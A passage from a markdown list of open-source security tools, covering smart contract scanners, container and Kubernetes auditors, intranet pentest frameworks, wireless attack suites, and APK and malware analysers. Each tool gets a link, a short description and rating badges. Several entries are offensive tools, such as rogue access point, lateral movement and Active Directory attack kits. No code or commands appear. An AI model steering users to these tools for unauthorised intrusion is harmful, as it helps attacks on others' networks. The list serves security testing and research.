![GitHub](https://img.shields.io/github/license/mnns/LLMFuzzer?style=flat-square)\n\n\n### Smart Contracts Security\n\n- https://github.com/ConsenSys/mythril - **Security analysis tool for EVM bytecode. Supports smart contracts built for Ethereum, Hedera etc.**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/ConsenSys/mythril?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/ConsenSys/mythril?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/ConsenSys/mythril.svg?style=flat-square) ![GitHub](https://img.shields.io/github/license/ConsenSys/mythril?style=flat-square)\n\n- https://github.com/enzymefinance/oyente - **An Analysis Tool for Smart Contracts**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/enzymefinance/oyente?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/enzymefinance/oyente?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/enzymefinance/oyente.svg?style=flat-square) ![GitHub](https://img.shields.io/github/license/enzymefinance/oyente?style=flat-square)\n\n- https://github.com/eth-sri/securify2 - **Official security scanner for Ethereum smart contracts supported by the Ethereum Foundation**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/eth-sri/securify2?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/eth-sri/securify2?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/eth-sri/securify2.svg?style=flat-square) ![GitHub](https://img.shields.io/github/license/eth-sri/securify2?style=flat-square)\n\n- https://github.com/smartdec/smartcheck - **Static analysis tool that detects vulnerabilities and bugs in Solidity programs**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Java--or--Node-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/smartdec/smartcheck?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/smartdec/smartcheck?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/smartdec/smartcheck.svg?style=flat-square) ![GitHub](https://img.shields.io/github/license/smartdec/smartcheck?style=flat-square)\n\n- https://github.com/ivicanikolicsg/MAIAN - **Automatic tool for finding trace vulnerabilities in Ethereum smart contracts**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/ivicanikolicsg/MAIAN?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/ivicanikolicsg/MAIAN?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/ivicanikolicsg/MAIAN.svg?style=flat-square) ![GitHub](https://img.shields.io/github/license/ivicanikolicsg/MAIAN?style=flat-square)\n\n\n### Red Team vs Blue Team\n\n#### Supply Chain Analysis(SCA)\n\n- https://github.com/murphysecurity/murphysec - **Open source tool for software supply chain security**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/murphysecurity/murphysec?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/murphysecurity/murphysec?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/murphysecurity/murphysec.svg?style=flat-square) ![GitHub](https://img.shields.io/github/license/murphysecurity/murphysec?style=flat-square)\n\n#### Container and Cluster\n\n- https://github.com/cdk-team/CDK - **A tool to gather information inside container/cluster and exploit them**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/cdk-team/CDK?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/cdk-team/CDK?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/cdk-team/CDK.svg?style=flat-square) ![GitHub](https://img.shields.io/github/license/cdk-team/CDK?style=flat-square)\n\n- https://github.com/cr0hn/dockerscan - **Docker security analysis & hacking tools**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/cr0hn/dockerscan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/cr0hn/dockerscan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/cr0hn/dockerscan?style=flat-square) ![GitHub](https://img.shields.io/github/license/cr0hn/dockerscan?style=flat-square)\n\n- https://github.com/armosec/kubescape - **The first tool for testing if Kubernetes is deployed securely as defined in Kubernetes Hardening Guidance by to NSA and CISA**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/armosec/kubescape?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/armosec/kubescape?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/armosec/kubescape?style=flat-square) ![GitHub](https://img.shields.io/github/license/armosec/kubescape?style=flat-square)\n\n- https://github.com/chaitin/veinmind-tools - **Container security scanner for backdoor, malicious, weak pass and sensitive and the like.**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go/Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/chaitin/veinmind-tools?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/chaitin/veinmind-tools?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/chaitin/veinmind-tools?style=flat-square) ![GitHub](https://img.shields.io/github/license/chaitin/veinmind-tools?style=flat-square)\n\n- https://github.com/deepfence/ThreatMapper - **Scan for in-production vulnerabilities and exposed secrets, and identify attack paths to reach them remotely**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/deepfence/ThreatMapper?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/deepfence/ThreatMapper?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/deepfence/ThreatMapper?style=flat-square) ![GitHub](https://img.shields.io/github/license/deepfence/ThreatMapper?style=flat-square)\n\n- https://github.com/deepfence/SecretScanner - **Scan containers and host filesystems for unprotected keys, API tokens and passwords**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/deepfence/SecretScanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/deepfence/SecretScanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/deepfence/SecretScanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/deepfence/SecretScanner?style=flat-square)\n\n- https://github.com/cyberark/KubiScan - **A tool to scan Kubernetes cluster for risky permissions**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/cyberark/KubiScan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/cyberark/KubiScan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/cyberark/KubiScan?style=flat-square) ![GitHub](https://img.shields.io/github/license/cyberark/KubiScan?style=flat-square)\n\n- https://github.com/kvesta/vesta - **A static analysis of vulnerabilities, Docker and Kubernetes cluster configuration detect toolkit**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/kvesta/vesta?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/kvesta/vesta?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/kvesta/vesta?style=flat-square) ![GitHub](https://img.shields.io/github/license/kvesta/vesta?style=flat-square)\n\n\n#### Services fingerprint detection\n\n- https://github.com/EdgeSecurityTeam/EHole - **Core system fingerprint detection tool for Red team**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/EdgeSecurityTeam/EHole?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/EdgeSecurityTeam/EHole?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/EdgeSecurityTeam/EHole.svg?style=flat-square) ![GitHub](https://img.shields.io/github/license/EdgeSecurityTeam/EHole?style=flat-square)\n\n#### Man-In-The-Middle\n\n- https://github.com/niloofarkheirkhah/nili - **Tool for Network Scan, Man in the Middle, Protocol Reverse Engineering and Fuzzing**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/niloofarkheirkhah/nili?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/niloofarkheirkhah/nili?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/niloofarkheirkhah/nili.svg?style=flat-square) ![GitHub](https://img.shields.io/github/license/niloofarkheirkhah/nili?style=flat-square)\n\n#### The framework\n\n- https://github.com/m4n3dw0lf/PytheM - **Multi-purpose network pentest framework**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/m4n3dw0lf/PytheM?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/m4n3dw0lf/PytheM?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/m4n3dw0lf/PytheM?style=flat-square) ![GitHub](https://img.shields.io/github/license/m4n3dw0lf/PytheM?style=flat-square)\n\n- https://github.com/FunnyWolf/Viper - **Graphical, Modularization and weaponization intranet penetration tool**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Ruby-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/FunnyWolf/Viper?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/FunnyWolf/Viper?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/FunnyWolf/Viper?style=flat-square) ![GitHub](https://img.shields.io/github/license/FunnyWolf/Viper?style=flat-square)\n\n- https://github.com/P1-Team/AlliN - **Mostly used for asset collection before penetration and lateral movement of intranet**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/P1-Team/AlliN?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/P1-Team/AlliN?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/P1-Team/AlliN?style=flat-square) ![GitHub](https://img.shields.io/github/license/P1-Team/AlliN?style=flat-square)\n\n- https://github.com/k8gege/LadonGo - **Pentest framework for Windows/Linux/Mac intranet networks**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/k8gege/LadonGo?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/k8gege/LadonGo?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/k8gege/LadonGo?style=flat-square) ![GitHub](https://img.shields.io/github/license/k8gege/LadonGo?style=flat-square)\n\n- https://github.com/shmilylty/netspy - **Quickly scan the reachable network segmentation of the intranet**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/shmilylty/netspy?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/shmilylty/netspy?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/shmilylty/netspy?style=flat-square) ![GitHub](https://img.shields.io/github/license/shmilylty/netspy?style=flat-square)\n\n- https://github.com/byt3bl33d3r/CrackMapExec - **Swiss army knife for pentesting Windows/Active Directory environments**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/byt3bl33d3r/CrackMapExec?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/byt3bl33d3r/CrackMapExec?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/byt3bl33d3r/CrackMapExec?style=flat-square) ![GitHub](https://img.shields.io/github/license/byt3bl33d3r/CrackMapExec?style=flat-square)\n\n- https://github.com/u21h2/nacs - **Event-driven intranet pentest scanner**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/u21h2/nacs?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/u21h2/nacs?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/u21h2/nacs?style=flat-square) ![GitHub](https://img.shields.io/github/license/u21h2/nacs?style=flat-square)\n\n\n- https://github.com/h4wkst3r/SCMKit - **Source Code Management Attack Toolkit,such as GitHub Enterprise, GitLab Enterprise and Bitbucket Server**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-CSharp-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/h4wkst3r/SCMKit?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/h4wkst3r/SCMKit?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/h4wkst3r/SCMKit?style=flat-square) ![GitHub](https://img.shields.io/github/license/h4wkst3r/SCMKit?style=flat-square)\n\n- https://github.com/lijiejie/MisConfig_HTTP_Proxy_Scanner - **Helps to scan misconfigured reverse proxy servers and misconfigured forward proxy servers**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/lijiejie/MisConfig_HTTP_Proxy_Scanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/lijiejie/MisConfig_HTTP_Proxy_Scanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/lijiejie/MisConfig_HTTP_Proxy_Scanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/lijiejie/MisConfig_HTTP_Proxy_Scanner?style=flat-square)\n\n- https://github.com/chainreactors/gogo - **A highly controllable and scalable automation engine for red teams**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/chainreactors/gogo?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/chainreactors/gogo?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/chainreactors/gogo?style=flat-square) ![GitHub](https://img.shields.io/github/license/chainreactors/gogo?style=flat-square)\n\n\n#### Wireless Pentest\n\n- https://github.com/savio-code/fern-wifi-cracker - **Testing and discovering flaws in ones own network**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/savio-code/fern-wifi-cracker?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/savio-code/fern-wifi-cracker?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/savio-code/fern-wifi-cracker?style=flat-square) ![GitHub](https://img.shields.io/github/license/savio-code/fern-wifi-cracker?style=flat-square)\n\n- https://github.com/P0cL4bs/WiFi-Pumpkin - **Framework for Rogue Wi-Fi Access Point Attack**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/P0cL4bs/WiFi-Pumpkin?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/P0cL4bs/WiFi-Pumpkin?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/P0cL4bs/WiFi-Pumpkin?style=flat-square) ![GitHub](https://img.shields.io/github/license/P0cL4bs/WiFi-Pumpkin?style=flat-square)\n\n- https://github.com/MisterBianco/BoopSuite - **A Suite of Tools written in Python for wireless auditing and security testing**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/MisterBianco/BoopSuite?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/MisterBianco/BoopSuite?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/MisterBianco/BoopSuite?style=flat-square) ![GitHub](https://img.shields.io/github/license/MisterBianco/BoopSuite?style=flat-square)\n\n- https://github.com/besimaltnok/PiFinger - **Searches for wifi-pineapple traces and calculate wireless network security score**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/besimaltnok/PiFinger?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/besimaltnok/PiFinger?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/besimaltnok/PiFinger?style=flat-square) ![GitHub](https://img.shields.io/github/license/besimaltnok/PiFinger?style=flat-square)\n\n- https://github.com/derv82/wifite2 - **A complete re-write of Wifite,Automated Wireless Attack Tool**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/derv82/wifite2?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/derv82/wifite2?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/derv82/wifite2?style=flat-square) ![GitHub](https://img.shields.io/github/license/derv82/wifite2?style=flat-square)\n\n- https://github.com/D3Ext/WEF - **Wi-Fi Exploitation Framework for 2.4 and 5 Ghz both attacks**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Bash-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/D3Ext/WEF?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/D3Ext/WEF?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/D3Ext/WEF?style=flat-square) ![GitHub](https://img.shields.io/github/license/D3Ext/WEF?style=flat-square)\n\n- https://github.com/pinecone-wifi/pinecone - **A WLAN red team framework**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/pinecone-wifi/pinecone?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/pinecone-wifi/pinecone?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/pinecone-wifi/pinecone?style=flat-square) ![GitHub](https://img.shields.io/github/license/pinecone-wifi/pinecone?style=flat-square)\n\n\n### Mobile Apps Packages Analysis\n\n- https://github.com/dwisiswant0/apkleaks - **Scanning APK file for URIs, endpoints & secrets**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/dwisiswant0/apkleaks?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/dwisiswant0/apkleaks?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/dwisiswant0/apkleaks?style=flat-square) ![GitHub](https://img.shields.io/github/license/dwisiswant0/apkleaks?style=flat-square)\n\n- https://github.com/kelvinBen/AppInfoScanner - **Collecting information from APK file, support self-defined rules**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/kelvinBen/AppInfoScanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/kelvinBen/AppInfoScanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/kelvinBen/AppInfoScanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/kelvinBen/AppInfoScanner?style=flat-square)\n\n- https://github.com/maaaaz/androwarn - **Yet another static code analyzer for malicious Android applications**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/maaaaz/androwarn?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/maaaaz/androwarn?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/maaaaz/androwarn?style=flat-square) ![GitHub](https://img.shields.io/github/license/maaaaz/androwarn?style=flat-square)\n\n- https://github.com/quark-engine/quark-engine - **Android Malware (Analysis | Scoring) System**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/quark-engine/quark-engine?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/quark-engine/quark-engine?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/quark-engine/quark-engine?style=flat-square) ![GitHub](https://img.shields.io/github/license/quark-engine/quark-engine?style=flat-square)\n\n- https://github.com/droidefense/engine - **Advance Android malware analysis framework**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Java-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/droidefense/engine?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/droidefense/engine?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/droidefense/engine?style=flat-square) ![GitHub](https://img.shields.io/github/license/droidefense/engine?style=flat-square)\n\n- https://github.com/abhi-r3v0/Adhrit - **Android Security Suite for in-depth reconnaissance and static bytecode analysis based on Ghera benchmarks**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/abhi-r3v0/Adhrit?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/abhi-r3v0/Adhrit?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/abhi-r3v0/Adhrit?style=flat-square) ![GitHub](https://img.shields.io/github/license/abhi-r3v0/Adhrit?style=flat-square) \"BlacHatUSA-arsenal-2022\"\n\n- https://github.com/pascal-lab/Tai-e - **An easy-to-learn/use static analysis framework for Java, especially for Android**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Java-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/pascal-lab/Tai-e?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/pascal-lab/Tai-e?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/pascal-lab/Tai-e?style=flat-square) ![GitHub](https://img.shields.io/github/license/pascal-lab/Tai-e?style=flat-square)\n\n- https://github.com/Cyber-Buddy/APKHunt - **A comprehensive static code analysis tool for Android apps that is based on the OWASP MASVS framework**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Cyber-Buddy/APKHunt?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Cyber-Buddy/APKHunt?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Cyber-Buddy/APKHunt?style=flat-square) ![GitHub](https://img.shields.io/github/license/Cyber-Buddy/APKHunt?style=flat-square)\n\n\n### Binary Executables Analysis\n\n- https://github.com/m4rco-/dorothy2 - **A malware/botnet analysis framework written in Ruby**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Ruby-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/m4rco-/dorothy2?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/m4rco-/dorothy2?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/m4rco-/dorothy2?style=flat-square) ![GitHub](https://img.shields.io/github/license/m4rco-/dorothy2?style=flat-square)\n\n- https://github.com/Tencent/HaboMalHunter - **Used for automated malware analysis and security assessment on the Linux system**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Tencent/HaboMalHunter?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Tencent/HaboMalHunter?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Tencent/HaboMalHunter?style=flat-square) ![GitHub](https://img.shields.io/github/license/Tencent/HaboMalHunter?style=flat-square)\n\n- https://github.com/KeenSecurityLab/BinAbsInspector - **Static analyzer for automated reverse engineering and scanning vulnerabilities in binaries**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Java-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/KeenSecurityLab/BinAbsInspector?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/KeenSecurityLab/BinAbsInspector?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/KeenSecurityLab/BinAbsInspector?style=flat-square) ![GitHub](https://img.shields.io/github/license/KeenSecurityLab/BinAbsInspector?style=flat-square)\n\n- https://github.com/fkie-cad/cwe_checker - **Static analyzer for detecting common bug classes such as buffer overflows in binaries**\n\n> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Rust-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/fkie-cad/cwe_checker?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/fkie-cad/cwe_checker?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/fkie-cad/cwe_checker?style=flat-square) ![GitHub](https://img.shields.io/github/license/fkie-cad/cwe_checker?style=flat-square)\n\n- https://github.com/airbus-seclab/bincat - **Binary code static analyser, with IDA 